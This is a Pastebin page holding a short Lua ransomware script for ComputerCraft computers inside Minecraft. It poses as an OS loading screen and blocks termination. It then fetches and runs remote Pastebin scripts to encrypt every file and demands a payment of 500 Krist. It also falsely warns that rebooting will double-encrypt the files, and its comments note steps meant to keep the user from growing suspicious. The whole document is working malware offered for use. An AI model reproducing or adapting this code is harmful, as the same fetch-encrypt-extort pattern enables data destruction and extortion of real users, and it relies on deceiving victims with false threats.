Advertisement
dehunter456

foihei

May 15th, 2015
626
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. --code by 385bc6cee1fcb9408cbe918ab9f07f81 (MD5, no salt, if you want to know who I am, you have to crack it.)
  2. os.pullEvent = os.pullEventRaw
  3. b="kru51yf9ua"
  4. shell.run("clear")
  5. print "CraftOS 1.7 loading..."
  6. sleep(1)
  7. if fs.exists("enc") then
  8.  print "already infected"
  9.  shell.run("pastebin run isM3sswE ",b,"500")
  10. else
  11. shell.run("pastebin get xpmUBpV8 enc") --thanks jake for enc lib, thanks dehunter for hosting on pastebin
  12. local FileList = fs.list("")
  13. for _, file in ipairs(FileList) do
  14.   if file ~= "startup" and file ~= "enc" then
  15.   shell.run("pastebin run khFAdTNL ", file)
  16.   end
  17. end
  18. shell.run("clear") --make user less suspicious
  19. shell.run("label set ", b)
  20. shell.run("clear") -- make user less suspicious
  21.   print "Your files are encrypted!"
  22.  print("You have to send a payment of 500 KST(Krist) to ", b)
  23.  print "DO NOT REBOOT OR SHUTDOWN! THIS WILL CAUSE ALL FILES TO BECOME DOUBLE ENCRYPTED, CAUSING YOU TO LOSE THEM!"
  24. sleep(1)
  25. shell.run("pastebin run isM3sswE ",b,"500") --thanks dehunter for ezpay
  26. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement